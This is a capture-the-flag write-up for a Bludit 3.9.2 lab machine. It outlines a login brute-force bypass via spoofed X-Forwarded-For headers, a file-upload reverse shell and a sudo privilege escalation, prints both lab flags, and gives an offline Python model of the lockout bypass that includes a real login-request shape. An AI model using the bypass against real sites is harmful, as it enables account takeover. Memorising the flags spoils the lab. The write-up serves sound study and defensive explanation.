11/2020

Description:

Target IP: 10.10.10.191.

The machine hosts a CMS, Bludit version 3.9.2, which is vulnerable to a brute-force mitigation bypass (CVE-2019-17240). Initial access is gained by brute-forcing the password of a user named in a *todo.txt* file found in the web server directory. User access is then acquired by exploiting an authenticated arbitrary file upload in Bludit's image upload handler (CVE-2019-16113) to place a reverse shell in a known folder on the server and trigger it. Privilege escalation (PE) is possible because the installed sudo is vulnerable to a security bypass (CVE-2019-14287), which applies when a sudoers rule lets the user run a command as any user except root.

Difficulty:

easy

Flags:

User: b4d54f7900777b4017d9b89dcb735ab1

Root: 3f7e1a14027f840fb15dd72b4e9b5978

Enumeration

Nmap port scan result.

! Discovered service: HTTP (80)

Examining the Apache web server on the target machine.

A login form is found on /admin

! Discovered product: Bludit CMS

<aside> 💡

Bludit is a free and open-source web and blog builder https://docs.bludit.com/en/

</aside>

Brute-forcing directories on the target website with gobuster.

! todo.txt is not a file shipped with a default Bludit deployment.

Examining the content of todo.txt .

! Discovered a possible user: fergus
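The next step is a password brute force against fergus, which only works because of the mitigation bypass named in the description (CVE-2019-17240): Bludit 3.9.2 counts failed logins per client IP, but takes that IP from the X-Forwarded-For request header whenever the client sends one, so a fresh random header value on every attempt never trips the lockout. The following is an added Python model of that behaviour, not code from the write-up or from Bludit. It simulates the vulnerable IP lookup beside a hardened one (socket peer address only) and runs the same brute-force loop against both, entirely offline. Assumptions: the 10-failure / 5-minute thresholds, the /admin/login form fields (tokenCSRF, username, password, save), the attacker address 10.10.14.5 and the wordlist are all constructed for the example.

```python
"""
Added example (not from the original write-up): a local model of why the
Bludit 3.9.2 login rate limiter can be bypassed (CVE-2019-17240).
Thresholds, form fields, addresses and the wordlist are assumptions.
No network traffic is generated.
"""
import random
import time
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Tuple

# Assumed lockout policy: block an IP for MINUTES_BLOCKED after FAILURES_ALLOWED failures.
FAILURES_ALLOWED = 10
MINUTES_BLOCKED = 5


def client_ip_vulnerable(headers: Dict[str, str], remote_addr: str) -> str:
    """Bludit-style lookup: trust X-Forwarded-For if the client supplied it."""
    return headers.get("X-Forwarded-For", remote_addr)


def client_ip_hardened(headers: Dict[str, str], remote_addr: str) -> str:
    """Hardened lookup: only the socket peer address, which the client cannot forge."""
    return remote_addr


@dataclass
class LoginService:
    """Stand-in for the login endpoint plus its per-IP failure bookkeeping."""
    username: str
    password: str
    ip_resolver: Callable[[Dict[str, str], str], str]
    attempts: Dict[str, int] = field(default_factory=dict)
    blocked_until: Dict[str, float] = field(default_factory=dict)
    now: Callable[[], float] = time.time

    def login(self, headers: Dict[str, str], remote_addr: str,
              username: str, password: str) -> str:
        ip = self.ip_resolver(headers, remote_addr)
        if self.blocked_until.get(ip, 0.0) > self.now():
            return "blocked"
        if username == self.username and password == self.password:
            self.attempts.pop(ip, None)
            return "ok"
        self.attempts[ip] = self.attempts.get(ip, 0) + 1
        if self.attempts[ip] >= FAILURES_ALLOWED:
            self.blocked_until[ip] = self.now() + MINUTES_BLOCKED * 60
        return "bad-credentials"


def random_ipv4(rng: random.Random) -> str:
    """Fresh spoofed source address for one attempt."""
    return ".".join(str(rng.randint(1, 254)) for _ in range(4))


def build_login_request(token_csrf: str, username: str,
                        password: str, spoofed_ip: str) -> dict:
    """Shape of one real attempt against /admin/login (form fields assumed)."""
    return {
        "method": "POST",
        "path": "/admin/login",
        "headers": {"X-Forwarded-For": spoofed_ip},
        "data": {"tokenCSRF": token_csrf, "username": username,
                 "password": password, "save": ""},
    }


def brute_force(service: LoginService, username: str, wordlist: List[str],
                spoof: bool = True, seed: int = 0) -> Tuple[Optional[str], int]:
    """Try each candidate; return (password or None, number of requests sent)."""
    rng = random.Random(seed)
    attacker_addr = "10.10.14.5"  # constructed attacker address
    tried = 0
    for candidate in wordlist:
        headers = {"X-Forwarded-For": random_ipv4(rng)} if spoof else {}
        tried += 1
        result = service.login(headers, attacker_addr, username, candidate)
        if result == "ok":
            return candidate, tried
        if result == "blocked":  # lockout reached: the run is over
            return None, tried
    return None, tried


if __name__ == "__main__":
    wordlist = [f"Password{i}" for i in range(1, 31)]  # constructed
    for name, resolver in (("vulnerable", client_ip_vulnerable),
                           ("hardened", client_ip_hardened)):
        svc = LoginService("fergus", "Password25", resolver)
        print(name, brute_force(svc, "fergus", wordlist))
```

Against the vulnerable resolver the spoofed header gives every request a new identity and the 25th candidate succeeds; against the hardened resolver the same loop is locked out after ten failures, which is also what happens when the header is omitted. A real run would first fetch /admin and extract the tokenCSRF value before each POST.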